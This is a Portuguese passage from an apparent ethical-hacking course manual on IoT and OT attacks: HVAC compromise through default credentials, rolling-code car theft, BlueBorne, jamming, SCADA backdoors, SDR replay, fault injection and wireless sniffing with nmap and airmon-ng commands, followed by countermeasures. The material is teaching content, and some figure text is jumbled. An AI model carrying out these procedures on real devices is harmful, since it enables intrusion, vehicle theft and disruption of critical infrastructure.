sistemas corporativos. Os sistemas HVAC têm muitas vulnerabilidades de segurança que são exploradas por
invasores para roubar credenciais de login, obter acesso ao sistema HVAC e realizar outros ataques à rede
da organização. Os sistemas HVAC são geralmente conectados às redes de várias indústrias, setores
governamentais, hospitais, etc. Esses sistemas fornecem direitos de acesso remoto a fornecedores de HVAC
e terceiros para apoiar sua administração remota, como monitoramento remoto de consumo de energia e
temperaturas em vários lugares. Além disso, muitas empresas HVAC fornecem nomes de login e senhas
comuns para diferentes organizações.
Os invasores se aproveitam disso para obter acesso remoto às redes corporativas e roubar informações
confidenciais das organizações.
Etapas seguidas por um invasor para explorar sistemas HVAC:
ÿ Atacante usa Shodan (https:// www.shodan.io) e procura vulnerabilidade industrial

sistemas de controle (ICSs)
ÿ Com base nos ICSs vulneráveis encontrados, o invasor procura o usuário padrão
credenciais usando ferramentas online como https:// www.defpass.com
ÿ O invasor usa credenciais de usuário padrão para tentar acessar o ICS
ÿ Depois de obter acesso ao ICS, o invasor tenta obter acesso ao sistema HVAC remotamente através
do ICS
ÿ Depois de obter acesso ao sistema HVAC, um invasor pode controlar a temperatura do HVAC ou
realizar outros ataques na rede local

Figura 10.6: Explorando o sistema HVAC

Rolling Code Attack

A vítima pressiona o botão
do controle remoto do
carro para destravar o carro
O carro não destrava; a Carro

Vítima
vítima tenta novamente
enviando o segundo código Na segunda
tentativa da
vítima, um invasor
O invasor usa o jammer para encaminha o
bloquear a recepção do primeiro código
código rolante enviado pelo que desbloqueia
carro e, simultaneamente, O invasor fareja o
fareja o primeiro código
o segundo código carro
O segundo código gravado é

usado posteriormente por um
Carro
Atacante com invasor para destravar e roubar o veículo
dispositivo de bloqueio
Rolling Code Attack
A maioria dos veículos inteligentes usa sistemas de travamento inteligentes, que incluem um sinal de RF transmitido
na forma de código de um chaveiro moderno para travar ou destravar o veículo. Aqui, o código enviado ao veículo é
usado apenas uma vez e é diferente para cada outro uso, ou seja, se um veículo receber o mesmo código novamente,
ele o rejeita.
O código que trava ou destrava um carro ou garagem é chamado de código rolante ou código de salto. Ele é usado
em um sistema de entrada sem chave para evitar ataques de repetição. Um bisbilhoteiro pode capturar o código
transmitido e posteriormente utilizá-lo para destravar a garagem ou o veículo.
Para obter o código rolante, o invasor impede a transmissão de um sinal do chaveiro para o receptor no veículo.
Esse ataque é executado usando um dispositivo de interferência que simultaneamente bloqueia o sinal e fareja o
código, e o invasor posteriormente usa esse código para destrancar o veículo ou a porta da garagem.
Por exemplo, abaixo estão as etapas seguidas por um invasor para executar um ataque de código contínuo:
ÿ Vítima prime botão do comando da viatura e tenta destrancar a viatura
ÿ Atacante usa um jammer que bloqueia a recepção do carro do código rolante enviado pelo
vítima e simultaneamente fareja o primeiro código
ÿ O carro não destrava; a vítima tenta novamente enviando um segundo código
ÿ Atacante fareja o segundo código
ÿ Na segunda tentativa da vítima, o atacante reenvia o primeiro código, que desbloqueia

o carro
ÿ O segundo código registado é utilizado posteriormente pelo assaltante para desbloquear e roubar a viatura

Os invasores podem usar ferramentas como rfcat-rolljam e RFCrack para realizar esse ataque.
Figura 10.7: Ilustração do ataque de código rolante

Ataque Blueborne
Um ataque BlueBorne é executado em conexões Bluetooth para obter acesso e assumir o controle total do
dispositivo de destino
Depois de obter acesso a um dispositivo, o invasor pode penetrar em qualquer rede corporativa usando esse dispositivo
para roubar informações críticas sobre a organização e espalhar malware para dispositivos próximos
Descubra o dispositivo Bluetooth
Recuperar endereço MAC
Rede corporativa
Enviar Sondas
Recuperar informações do sistema operacional
habilitado para Bluetooth

Obtém Acesso e Controla a Impressora Impressora
para acessar a Rede Corporativa

Atacante
Ataque Blueborne
Um ataque BlueBorne é executado em conexões Bluetooth para obter acesso e assumir o controle total do dispositivo
de destino. Os invasores se conectam a dispositivos próximos e exploram as vulnerabilidades do protocolo Bluetooth
para comprometer os dispositivos. BlueBorne é uma coleção de várias técnicas baseadas nas vulnerabilidades
conhecidas do protocolo Bluetooth. Esse ataque pode ser executado em vários dispositivos IoT, incluindo aqueles que
executam sistemas operacionais como Android, Linux, Windows e versões anteriores do iOS. Em todos os sistemas
operacionais, o processo Bluetooth tem altos privilégios. Depois de obter acesso a um dispositivo, um invasor pode
penetrar em qualquer rede corporativa usando esse dispositivo para roubar informações críticas da organização e
espalhar malware para dispositivos próximos.
BlueBorne é compatível com todas as versões de software e não requer nenhuma interação do usuário, pré-condição
ou configuração, exceto para o Bluetooth estar ativo. Este ataque estabelece uma conexão com o dispositivo habilitado
para Bluetooth de destino, mesmo sem emparelhar com o dispositivo.
Usando esse ataque, um invasor pode descobrir dispositivos habilitados para Bluetooth, mesmo que não estejam em
um modo de descoberta ativo. Depois que o invasor identifica qualquer dispositivo próximo, ele tenta extrair o endereço
MAC e as informações do sistema operacional para realizar uma exploração adicional no sistema operacional de destino.
Com base nas vulnerabilidades presentes no protocolo Bluetooth, os invasores podem até realizar execução remota de
código e ataques man-in-the-middle no dispositivo de destino. Esse ataque pode ser executado em vários dispositivos
IoT, como smart TVs, telefones, relógios, sistemas de áudio automotivos, impressoras, etc.
Etapas para executar o ataque BlueBorne:
ÿ O invasor descobre dispositivos habilitados para Bluetooth ativos ao seu redor; todos os dispositivos habilitados
para Bluetooth podem ser localizados mesmo que não estejam no modo detectável

ÿ Após localizar qualquer dispositivo próximo, o invasor obtém o endereço MAC do dispositivo
ÿ Agora, o invasor envia sondagens contínuas ao dispositivo de destino para determinar o sistema operacional
ÿ Depois de identificar o sistema operacional, o invasor explora as vulnerabilidades no protocolo Bluetooth para
obter acesso ao dispositivo de destino
ÿ Agora o invasor pode realizar a execução remota de código ou um ataque man-in-the-middle

e assuma o controle total do dispositivo
Figura 10.8: Ilustração do ataque BlueBorne

ataque de interferência
Jamming é um tipo de ataque no

qual as comunicações entre
dispositivos IoT sem fio
estão atolados para que possam
ser comprometidos
Um invasor transmite rádio

sinais aleatoriamente com a
mesma frequência que os nós
sensores para comunicação
Atacante
enviando sinais de
Como resultado, a rede fica interferência com

a mesma frequência
congestionada, o que impede
os endpoints de enviar ou
receber qualquer mensagem.
Atacante Bloqueio
Dispositivo
ataque de interferência
Jamming é um tipo de ataque no qual as comunicações entre dispositivos IoT sem fio são bloqueadas para
comprometê-los. Durante esse ataque, um grande volume de tráfego malicioso é enviado, o que resulta em um
ataque DoS aos usuários autorizados, obstruindo o tráfego legítimo e tornando os endpoints incapazes de se
comunicar entre si. Todo dispositivo sem fio e a rede sem fio são propensos a esse ataque.
Os invasores usam tipos especiais de hardware e transmitem sinais de rádio aleatoriamente com a frequência
na qual o dispositivo de destino está se comunicando. Os sinais ou o tráfego gerado pelo dispositivo bloqueador
aparecem como ruído para os dispositivos sem fio, o que faz com que eles retenham suas transmissões até
que o ruído diminua. Isso resulta em um ataque DoS que congestiona a rede e os dispositivos não conseguem
enviar ou receber dados.

Figura 10.9: Ilustração do ataque de bloqueio

Hacking Smart Grid/Dispositivos Industriais:

Acesso remoto usando backdoor
O invasor envia um e-mail para O trabalhador abre o e-mail de

O invasor obtém acesso a
trabalhadores de uma organização aparência legítima e faz o download Baixar o arquivo? a rede local do
com um arquivo malicioso anexado o anexo
organização alvo
Sim Não
Este arquivo malicioso instala um Organização
Atacante backdoor para o invasor
Nossas promessas Rede
Por favor, escreva seu grande título está aqui

O invasor desativa o
fontes de alimentação,
deixando a cidade às escuras
Mas devo explicar a você como toda essa ideia equivocada de denunciar
Ataque entra no SCADA e
prazer e louvor dor resultante prazer? desabilita o UPS
Vítima HVAC
Hacking Smart Grid/Dispositivos Industriais: Acesso Remoto usando Backdoor

Os invasores coletam informações básicas sobre a organização-alvo usando várias técnicas de
engenharia social. Depois de obter informações como IDs de e-mail dos funcionários, um
invasor envia e-mails de phishing para os funcionários com um anexo malicioso (por exemplo,
um documento do Word). Quando um funcionário da organização de destino abre o e-mail e
clica no anexo, um backdoor é instalado automaticamente no sistema de destino. Usando o
backdoor, o invasor obtém acesso à rede privada da organização. Por exemplo, considere um
ataque a uma rede elétrica. Nesse tipo de ataque, após obter acesso à rede privada, um invasor
pode acessar a rede SCADA (Supervisory Control and Data Acquisition) que controla a rede.
Depois de obter acesso à rede SCADA, o invasor substitui o firmware legítimo por um firmware
malicioso para processar os comandos enviados pelo invasor. Por fim, o invasor pode desativar
o fornecimento de energia de qualquer local específico enviando comandos maliciosos aos
sistemas de controle da subestação a partir da rede SCADA.
Figura 10.10: Hackeando uma rede inteligente para obter acesso remoto

Ataques baseados em SDR em IoT
O invasor usa rádio definido por software (SDR) para examinar os sinais de comunicação na rede
IoT e envia conteúdo de spam ou textos para os dispositivos interconectados
Replay Attack
ÿ O invasor obtém a frequência específica usada para compartilhar informações entre dispositivos conectados e
captura os dados originais quando um comando é iniciado por esses dispositivos
ÿ O invasor segrega a sequência de comandos e a injeta na rede IoT
Ataque de criptoanálise
ÿ O atacante usa o mesmo procedimento seguido em um ataque de repetição, juntamente com a engenharia reversa do
protocolo para capturar o sinal original
ÿ O atacante deve ser habilidoso em criptografia, teoria da comunicação e esquemas de modulação para realizar este ataque
Ataque de Reconhecimento
ÿ O invasor obtém informações sobre o dispositivo alvo a partir das especificações do dispositivo
ÿ O invasor então usa um multímetro para investigar o chipset e marcar algumas identificações como
pinos de aterramento para descobrir o ID do produto e outras informações
Ataques baseados em SDR em IoT
Rádio definido por software (SDR) é um método de geração de comunicações de rádio e implementação de
processamento de sinal usando software (ou firmware), em vez do método usual de usar hardware. Usando esse
sistema de comunicação de rádio baseado em software (SDRs autocriados), um invasor pode examinar os sinais de
comunicação nas redes IoT e enviar conteúdo ou textos de spam para dispositivos interconectados. O sistema SDR
também pode alterar a transmissão e recepção de sinais entre dispositivos, dependendo de suas implementações de
software. O ataque pode ser realizado nos modos de transmissão full-duplex (comunicação bidirecional) e half-duplex
(comunicação unidirecional).
Tipos de ataques baseados em SDR executados por invasores para invadir um ambiente IoT:
ÿ Replay Attack
Este é o principal ataque descrito em ameaças de IoT, no qual os invasores podem capturar a sequência de
comandos dos dispositivos conectados e utilizá-la para posterior retransmissão.
Um invasor pode executar as etapas abaixo para iniciar um ataque de repetição:
o O invasor tem como alvo a frequência especificada necessária para compartilhar informações
entre dispositivos
o Após obter a frequência, o invasor pode capturar os dados originais quando o

os comandos são iniciados pelos dispositivos conectados
o Depois que os dados originais são coletados, o invasor usa ferramentas gratuitas como URH
(Universal Radio Hacker) para segregar a sequência de comandos
o O invasor então injeta a sequência de comando segregada na mesma frequência na rede IoT, que reproduz
os comandos ou sinais capturados dos dispositivos

ÿ Ataque de Criptoanálise
Um ataque de criptoanálise é outro tipo de ataque substancial em dispositivos IoT. Neste ataque, o
procedimento utilizado pelo atacante é o mesmo de um ataque de replay, exceto por uma etapa adicional,
ou seja, a engenharia reversa do protocolo para obter o sinal original. Para realizar essa tarefa, o invasor
deve ser hábil em criptografia, teoria da comunicação e esquema de modulação (para remover ruídos do
sinal). Esse ataque praticamente não é tão fácil quanto um ataque de repetição, mas o invasor pode tentar
violar a segurança usando várias ferramentas e procedimentos.
ÿ Ataque de Reconhecimento
Esta é uma adição a um ataque de criptoanálise. Nesse ataque, as informações podem ser obtidas nas
especificações do dispositivo. Todos os dispositivos IoT que funcionam através de sinais de RF devem ser
certificados pela autoridade de seu país e, em seguida, divulgam oficialmente um relatório de análise do
dispositivo. Os designers geralmente evitam esse tipo de análise ocultando quaisquer marcas de
identificação do chipset. Portanto, o invasor faz uso de multímetros para investigar o chipset e marcar
algumas identificações, como pinos de aterramento, para descobrir o ID do produto e compará-lo com o
relatório publicado.

Ataques de injeção de falha
ÿ Ataques de injeção de falhas, também conhecidos como ataques de

perturbação, ocorrem quando um perpetrador injeta qualquer programa
defeituoso ou malicioso no sistema para comprometer a segurança do sistema
Tipos de Ataques de Injeção de Falha
Injeção de falhas ópticas e eletromagnéticas (EMFI), Falha de energia/relógio/reinicialização

Injeção de polarização corporal (BBI) Os invasores injetam falhas ou glitches na fonte de
Os invasores injetam falhas no dispositivo usando alimentação e na rede de clock do chip
lasers de projeção e pulsos eletromagnéticos
Violação de Frequência/Tensão Ataques de temperatura
Os invasores adulteram as condições de operação, Os invasores alteram a temperatura de operação

modificam o nível da fonte de alimentação e/ou do chip, afetando todo o ambiente operacional
alteram a frequência do clock do chip
Ataques de injeção de falha
Os ataques de injeção de falha, também conhecidos como ataques de perturbação, ocorrem quando um perpetrador
injeta um programa defeituoso ou malicioso em um sistema para comprometer a segurança do sistema. Esses
programas defeituosos podem ser induzidos usando várias técnicas de ataque. Os ataques de injeção de falhas
podem ser de natureza invasiva e não invasiva.
Em ataques não invasivos, o invasor deve estar disponível muito próximo ao chip para adulterar o programa ou dados
padrão e coletar informações confidenciais. Em um ataque invasivo, a superfície do chip deve ser visível para o invasor
e pode ser operada fisicamente.
Discutidos abaixo são diferentes tipos de ataque de injeção de falha:
ÿ Injeção de falha óptica, eletromagnética (EMFI), injeção de polarização do corpo (BBI)
O principal objetivo desses ataques é injetar falhas em dispositivos projetando lasers e pulsos eletromagnéticos
que são usados em blocos analógicos como geradores de números aleatórios (RNGs) e para aplicação de
pulsos de alta tensão. Essas falhas são usadas pelos invasores para comprometer a segurança do sistema.
ÿ Falha de energia/relógio/reinicialização
Esses tipos de ataques ocorrem quando falhas ou glitches são injetados na fonte de alimentação que pode
ser usada para execução remota, causando também o salto de instruções importantes.
As falhas também podem ser injetadas na rede de relógio usada para fornecer um sinal sincronizado pelo
chip.
ÿ Alteração de frequência/tensão
Nesses ataques, os invasores tentam adulterar as condições de operação de um chip, podendo também
modificar o nível da fonte de alimentação e alterar a frequência do clock do chip.

lasca. A intenção dos invasores é introduzir um comportamento de falha no chip para comprometer
a segurança do dispositivo.
ÿ Ataques de Temperatura
Os invasores alteram a temperatura de operação do chip, alterando assim todo o ambiente

operacional. Este ataque pode ser operado em condições não nominais.
Depois de injetar falhas usando várias técnicas, agora os invasores podem explorar o comportamento de
falha do dispositivo para realizar vários ataques para roubar informações confidenciais ou interromper a
operação normal do dispositivo.

Capturando e analisando o tráfego IoT usando o Wireshark

Execute o Nmap para identificar dispositivos IoT usando portas HTTP inseguras
01
nmap -p 80,81,8080,8081 <Intervalo de endereços IP de destino>
02 Execute ifconfig para identificar sua placa wireless, aqui wlan0
Execute o Airmon-ng para colocar a placa wireless no modo monitor

03 airmon-ng start wlan0
Execute o Airodump-ng para verificar todas as redes sem fio

04 próximas airodump-ng start wlan0mon
Descubra a rede sem fio de destino e anote o canal correspondente

05
para farejar o tráfego usando o Wireshark
Em seguida, configure sua placa wireless para ouvir o tráfego no

06 mesmo canal usando Airmon-ng
airmon-ng start wlan0mon 11
Inicie o Wireshark e clique duas vezes na interface que foi mantida no

07
modo monitor, aqui wlan0mon e comece a capturar o tráfego
Capturando e analisando o tráfego IoT usando o Wireshark
Muitos dispositivos IoT, como câmeras de segurança, hospedam um site para controlar ou configurar as câmeras de um local
remoto. Esses sites implementam principalmente o protocolo HTTP inseguro em vez de HTTPS e são vulneráveis a vários ataques.
Se as câmeras estiverem usando credenciais padrão de fábrica, um invasor pode facilmente interceptar todo o tráfego que flui
entre a câmera e o aplicativo da Web e ainda obter acesso à própria câmera. Os invasores podem usar ferramentas como o
Wireshark para interceptar esse tráfego e descriptografar a chave Wi-Fi da rede de destino.
Etapas usadas pelos invasores para detectar o tráfego sem fio de uma câmera da web:
ÿ Execute o Nmap para identificar dispositivos IoT usando portas HTTP inseguras para transmissão de dados:
nmap -p 80,81,8080,8081 <Intervalo de endereços IP de destino>

ÿ Agora, configure sua placa sem fio no modo monitor e identifique o canal usado pelo roteador de destino para transmissão.
Para isso, execute ifconfig para identificar sua placa wireless, aqui:
wlan0
ÿ Execute o Airmon-ng para colocar a placa wireless no modo monitor:
airmon-ng start wlan0
ÿ Em seguida, execute o Airodump-ng para verificar todas as redes sem fio próximas:
airodump-ng start wlan0mon

ÿ Agora, descubra a rede sem fio de destino e anote o canal correspondente para
fareje o tráfego usando o Wireshark

ÿ Em seguida, configure sua placa wireless para ouvir o tráfego no mesmo canal. Por exemplo, se o canal da
rede de destino for 11, execute Airmon-ng para configurar sua placa wireless ouvindo no canal 11:
airmon-ng start wlan0mon 11

ÿ Inicie o Wireshark e clique duas vezes na interface que foi mantida no modo monitor, aqui wlan0mon, e
comece a capturar o tráfego
Depois de capturar o tráfego, os invasores podem analisar e descriptografar as chaves WEP e WPA usando o
Wireshark e podem invadir o dispositivo IoT de destino para roubar informações confidenciais.
Figura 10.11: Captura de tela do Wireshark

Ferramentas de ataque IoT
Firmalisador
O Firmalyzer permite que fornecedores de dispositivos e profissionais de segurança Scanner de Vulnerabilidade RIoT
https:// www.beyondtrust.com
realizem uma avaliação de segurança automatizada em software que alimenta
dispositivos IoT (firmware) para identificar vulnerabilidades de configuração e aplicativos
Foren6
https:// cetic.github.io
Inspetor IoT
https:// www.iot-inspector.com
RFCrack
https:// github.com
HackRF One
https:// greatscottgadgets.com
https:// firmalyzer.com
Ferramentas de ataque IoT
Listadas abaixo estão algumas das ferramentas de hacking de IoT usadas por invasores para explorar dispositivos
e redes de IoT de destino para realizar vários ataques, como DDoS, interferência e ataques BlueBorne.
ÿ Firmalisador
Fonte: https:// firmalyzer.com
O Firmalyzer permite que fornecedores de dispositivos e profissionais de segurança realizem uma

avaliação de segurança automatizada do software que alimenta os dispositivos IoT (firmware) para
identificar vulnerabilidades de configuração e aplicativos. Essa ferramenta notifica os usuários sobre as
vulnerabilidades descobertas e ajuda a mitigá-las em tempo hábil.

Figura 10.12: captura de tela do Firmalyzer
Listadas abaixo estão algumas ferramentas adicionais para executar o hacking IoT:
ÿ RIoT Vulnerability Scanner (https:// www.beyondtrust.com)

ÿ Foren6 (https:// cetic.github.io)
ÿ IoT Inspector (https:// www.iot-inspector.com)
ÿ RFCrack (https:// github.com)
ÿ HackRF One (https:// greatscottgadgets.com)

Fluxo do módulo

2 Ataques
Discutir ataque IoT

3 Contramedidas
Discutir contramedidas de ataque de IoT
Esta seção discute várias medidas de segurança IoT e ferramentas de segurança que podem ser
usadas para prevenir, proteger e recuperar de vários tipos de ataques em dispositivos IoT e suas redes.
Seguindo essas contramedidas, as organizações podem implementar mecanismos de segurança
adequados para proteger as informações confidenciais transmitidas entre os dispositivos e a rede
corporativa.

Contramedidas de ataque IoT
Desative as contas de usuário “convidado” e “demo” se habilitadas
Use o recurso "Bloquear" para bloquear contas por uso excessivo

tentativas de login inválidas
Implemente mecanismos de autenticação fortes
Localize redes e dispositivos do sistema de controle atrás de firewalls e isole-

os da rede comercial
Implemente a criptografia de ponta a ponta e use a chave pública

Infraestrutura (PKI)
Corrija vulnerabilidades e atualize o firmware do dispositivo regularmente
Contramedidas de ataque IoT
ÿ Desative as contas de usuário “convidado” e “demo” se habilitadas
ÿ Use o recurso “Bloquear” para bloquear contas para tentativas de login inválidas excessivas
ÿ Implementar um forte mecanismo de autenticação
ÿ Localizar redes e dispositivos do sistema de controle atrás de firewalls e isolá-los do

Rede de negócios
ÿ Implementar IPS e IDS na rede
ÿ Implementar criptografia de ponta a ponta e usar infraestrutura de chave pública (PKI)
ÿ Use arquitetura VPN para comunicação segura
ÿ Implantar segurança como um sistema unificado e integrado
ÿ Permitir que apenas endereços IP confiáveis acessem o dispositivo pela Internet
ÿ Desabilitar telnet (porta 23)
ÿ Desabilite a porta UPnP nos roteadores
ÿ Proteger os dispositivos contra adulteração física
ÿ Corrigir vulnerabilidades e atualizar o firmware do dispositivo regularmente
ÿ Monitore o tráfego na porta 48101, pois os dispositivos infectados tentam espalhar o arquivo malicioso
usando a porta 48101

ÿ A posição dos nós móveis deve ser verificada com o objetivo de referir um nó físico com uma identidade de
veículo apenas, o que significa que um veículo não pode ter duas ou mais identidades
ÿ A privacidade de dados deve ser implementada; portanto, a conta ou identidade do usuário deve ser
mantidos protegidos e escondidos de outros usuários
ÿ A autenticação dos dados deve ser realizada para confirmar a identidade da fonte original
nó
ÿ Manter a confidencialidade dos dados usando criptografia de chave simétrica
ÿ Implemente uma política de senha forte que exija uma senha de pelo menos 8 a 10 caracteres
com uma combinação de letras, números e caracteres especiais
ÿ Use CAPTCHA e métodos de política de bloqueio de conta para evitar ataques de força bruta
ÿ Use dispositivos fabricados por fabricantes com histórico de conscientização de segurança
ÿ Isolar dispositivos IoT em redes protegidas

Ferramentas de segurança IoT
SeaCat.io é uma tecnologia SaaS de segurança para DigiCert IoT Device

SeaCat.io Manager https://
operar produtos IoT de maneira confiável, escalável e segura
www.digicert.com
FortiNAC
https:// www.fortinet.com
darktarce
https:// www.darktrace.com
Proteção de sistema crítico da

Symantec https:// www.symantec.com
Defesa contra ameaças de IoT da

Cisco https:// www.cisco.com
https:// www.teskalabs.com
Ferramentas de segurança IoT
A IoT não é a única gama de dispositivos conectados à Internet, mas também é uma tecnologia muito complexa e em
rápido crescimento. Para entender e analisar vários fatores de risco, soluções de segurança adequadas devem ser
incorporadas para proteger os dispositivos IoT. O uso de ferramentas de segurança IoT ajuda as organizações a limitar
significativamente as vulnerabilidades de segurança, protegendo assim os dispositivos e redes IoT de diferentes tipos de
ataques.
ÿ SeaCat.io
Fonte: https:// www.teskalabs.com
SeaCat.io é uma tecnologia SaaS de segurança para operar produtos IoT de maneira confiável, escalável e
segura. Ele fornece proteção para usuários finais, empresas e dados.
Os profissionais de segurança usam SeaCat.io para gerenciar produtos conectados a partir de um local central,
acessar dispositivos remotos usando várias ferramentas, monitorar dispositivos conectados e automatizar
atualizações para corrigir bugs, proteger usuários com criptografia autorizada e cumprir regulamentos, garantir
que os dispositivos estejam livres de malware e prevenir hackers os controlem e os tornem parte de uma botnet,
etc.

Figura 10.13: Captura de tela do SeaCat.io
Listadas abaixo estão algumas das ferramentas e soluções adicionais de segurança IoT:
ÿ DigiCert IoT Device Manager (https:// www.digicert.com)

ÿ FortiNAC (https:// www.fortinet.com)
ÿ darktrace (https:// www.darktrace.com)
ÿ Symantec Critical System Protection (https:// www.symantec.com)
ÿ Cisco IoT Threat Defense (https:// www.cisco.com)

Ataques OT
Ataques OT

Fluxo do módulo
Entenda OT
1
Conceitos
Discutir Ameaças OT
2 e Ataques
Discutir ataque OT
3
Contramedidas
Entenda os conceitos de OT
A tecnologia operacional (TO) desempenha um papel importante na sociedade moderna de hoje, pois
impulsiona uma coleção de dispositivos projetados para trabalhar juntos como um sistema integrado
ou homogêneo. Por exemplo, OT em telecomunicações é usado para transferir informações da rede
elétrica por meio de energia de roda. As mesmas telecomunicações também são usadas para
transações financeiras entre produtores e consumidores de eletricidade. OT é uma combinação de
hardware e software usado para monitorar, executar e controlar ativos de processos industriais. Antes
de aprender a hackear OT, é importante entender seus conceitos básicos. Esta seção discute vários
conceitos importantes relacionados ao OT.

Tecnologia Operacional (TO) é o software e hardware projetado para

detectar ou causar alterações nas operações industriais por meio do
monitoramento direto e/ou controle de dispositivos físicos industriais
O que é TO?
OT consiste em Sistemas de Controle Industrial (ICS) para monitorar e
controlar as operações industriais
Setor de serviços públicos Eletricidade Sinal de transito

Transporte
Rede de Água Vigilância

OT
ICS
Enchimento de Gás Caminhão
SCADA OT
DCS
ECG Robô
Máquina
UTR
CLP ressonância magnética
Incêndio
scanner
Extintor
biométrico
Indústria de saúde Microscópio Prédio comercial
O que é TO?
OT é uma combinação de software e hardware projetado para detectar ou causar alterações nas operações industriais
por meio de monitoramento direto e/ou controle de dispositivos físicos industriais. Esses dispositivos incluem
interruptores, bombas, luzes, sensores, câmeras de vigilância, elevadores, robôs, válvulas e sistemas de resfriamento
e aquecimento. Qualquer sistema que analise e processe dados operacionais (como componentes técnicos,
eletrônicos, telecomunicações e sistemas de computador) pode fazer parte do OT.
Os sistemas OT são usados nos setores de manufatura, mineração, saúde, construção, transporte, petróleo e gás,
defesa e serviços públicos, bem como em muitos outros setores, para garantir a segurança de dispositivos físicos e
suas operações em redes. Esta tecnologia consiste em Sistemas de Controle Industrial (ICSs), que incluem Controle
de Supervisão e Aquisição de Dados (SCADA), Unidades Terminais Remotas (RTU), Controladores Lógicos
Programáveis (PLC), Sistemas de Controle Distribuído (DCSs) e muitos outros sistemas de rede dedicados que
auxiliar no monitoramento e controle das operações industriais.
Os sistemas OT empregam diferentes abordagens para projetar hardware e protocolos que não estão familiarizados
com a TI. O suporte a versões mais antigas de software e hardware torna os sistemas OT mais vulneráveis a ataques
cibernéticos, pois é muito difícil desenvolver correções ou patches para eles.

Figura 10.14: Dispositivos conectados a uma rede OT
Figura 10.15: Componentes do OT

Terminologia Essencial
Bens
Os sistemas OT consistem em ativos físicos , como sensores e atuadores, servidores,
estações de trabalho, dispositivos de rede e PLCs, e ativos lógicos, como gráficos de fluxo, lógica
de programa, bancos de dados, firmware e regras de firewall
Zonas e Condutas
Uma técnica de segregação de rede usada para isolar as redes e ativos para impor e
manter fortes mecanismos de controle de acesso
Rede Industrial
Uma rede de sistemas de controle automatizados é conhecida como rede industrial.
Rede de negócios
É composto por uma rede de sistemas que oferecem infraestrutura de informação ao

negócio
(continua)
Protocolos Industriais
Protocolos usados para comunicação serial e comunicação via Ethernet padrão. Ex: S7,
CDA, CIP, Modbus, etc.
Perímetro de rede
É o limite externo de uma zona de rede, ou seja, grupo fechado de ativos
Perímetro de Segurança Eletrônica

É referido como o limite entre zonas seguras e inseguras
Infraestrutura crítica
Uma coleção de sistemas e ativos físicos ou lógicos cuja falha ou destruição afetará gravemente
a segurança, a proteção, a economia ou a saúde pública
Discutidos abaixo estão alguns dos termos mais importantes e amplamente usados relacionados aos
sistemas OT:
ÿ Património
Diferentes componentes da OT são geralmente referidos como ativos. A maioria dos sistemas OT,
como ICSs, compreende ativos físicos, como sensores e atuadores, servidores, estações de trabalho,

dispositivos de rede, PLCs, etc. Os sistemas ICS também incluem ativos lógicos que representam o
funcionamento e a contenção de ativos físicos, como gráficos que representam fluxo de processo, lógica de
programa, banco de dados, firmware ou regras de firewall.
ÿ Zonas e Condutas
Zonas e conduítes é uma técnica de segregação de rede usada para isolar redes e ativos para impor e manter
fortes mecanismos de controle de acesso.
ÿ Rede Industrial e Rede Empresarial
OT geralmente compreende uma coleção de sistemas de controle automatizados. Esses sistemas são
conectados em rede para atingir um objetivo de negócios. Uma rede composta por esses sistemas é conhecida
como rede industrial. Uma rede corporativa ou de negócios compreende uma rede de sistemas que oferecem
uma infraestrutura de informações para o negócio. Muitas vezes, as empresas precisam estabelecer
comunicações entre redes comerciais e redes industriais.
ÿ Protocolos Industriais
A maioria dos sistemas OT emprega protocolos proprietários (S7, CDA, SRTP, etc.) ou não proprietários
(Modbus, OPC, DNP3, CIP, etc.). Esses protocolos são geralmente usados para comunicação serial e também
podem ser usados para comunicação sobre Ethernet padrão usando o Protocolo de Internet (IP) junto com os
protocolos da camada de transporte TCP ou UDP. Como esses protocolos operam na camada de aplicativo,
eles são chamados de aplicativos.
ÿ Perímetro de Rede/Perímetro de Segurança Eletrônica
O perímetro da rede é o limite externo de uma zona de rede, ou seja, um grupo fechado de ativos. Ele atua
como um ponto de separação entre o interior e o exterior de uma zona. Geralmente, os controles de segurança
cibernética são implementados no perímetro da rede. Um Perímetro de Segurança Eletrônica refere-se a um
limite entre zonas seguras e inseguras.
ÿ Infraestrutura Crítica
A infraestrutura crítica refere-se a uma coleção de sistemas e ativos físicos ou lógicos, cuja falha ou destruição
afetará gravemente a segurança, a proteção, a economia ou a saúde pública.

Convergência TI/OT (IIOT)
Mecânico
Nuvem
Dispositivos
SCADA Internet
Maior
DCS
OT segurança,
qualidade e
ISTO Redes
produtividade
Armazenamento e
CLPs
Processamento de dados
SQL, Java,
UTRs
Python, etc.
A convergência TI/TO é a integração de A convergência TI/OT pode permitir a O uso dessa Internet das Coisas (IoT) para
Sistemas de computação de TI e manufatura inteligente conhecida como operações industriais, como monitoramento
sistemas de monitoramento de indústria 4.0, onde aplicações IoT são usadas de cadeias de suprimentos, manufatura e
operação OT para preencher a lacuna em operações industriais sistemas de gerenciamento, é chamado de
entre as tecnologias de TI/OT para Industrial
melhorar a segurança, eficiência e produtividade gerais Internet das Coisas (IIoT)
Convergência TI/OT (IIOT)
A convergência de TI/TO é a integração de sistemas de computação de TI (tecnologia da informação) e sistemas de

monitoramento de operação de TO. Preencher a lacuna entre TI e OT pode melhorar os negócios em geral, produzindo
resultados mais rápidos e eficientes. A convergência de TI/TO não é apenas sobre a combinação de tecnologias, mas
também sobre equipes e operações. As equipes de TI e OT são tradicionalmente separadas e são encontradas em
seus respectivos domínios. Por exemplo, as equipes de TI monitoram processos internos, como programação,
atualização de sistemas e proteção de redes contra ataques cibernéticos, enquanto as equipes de TO garantem a
manutenção e o gerenciamento geral, incluindo funcionários e equipamentos industriais.
As equipes de TI/OT precisam entender as operações e a estrutura de trabalho umas das outras. Isso não significa
transformar engenheiros de TI em engenheiros de campo/fábrica ou vice-versa; trata-se de construir uma ponte entre
eles para cooperar entre si para melhorar a segurança, eficiência, qualidade e produtividade.
Benefícios de mesclar OT com TI
A convergência de TI/OT pode permitir a fabricação inteligente conhecida como indústria 4.0, na qual os aplicativos de
IoT são usados em operações industriais. O uso da IoT para operações industriais, como monitoramento da cadeia de
suprimentos, manufatura e sistemas de gerenciamento, é chamado de Internet das Coisas Industrial (IIoT).
A seguir estão alguns dos benefícios da convergência de TI/OT:
ÿ Aprimoramento da Tomada de Decisão: A tomada de decisão pode ser aprimorada pela integração de dados OT
em soluções de inteligência de negócios.

ÿ Melhorando a Automação: O fluxo de negócios e as operações de controle industrial podem ser

otimizado pela fusão OT/IT; juntos, eles podem melhorar a automação.
ÿ Acelere a produção de negócios: a convergência de TI/OT pode organizar ou simplificar projetos de

desenvolvimento para acelerar a produção de negócios.
ÿ Minimização de Despesas: Reduz os overheads tecnológicos e organizacionais.
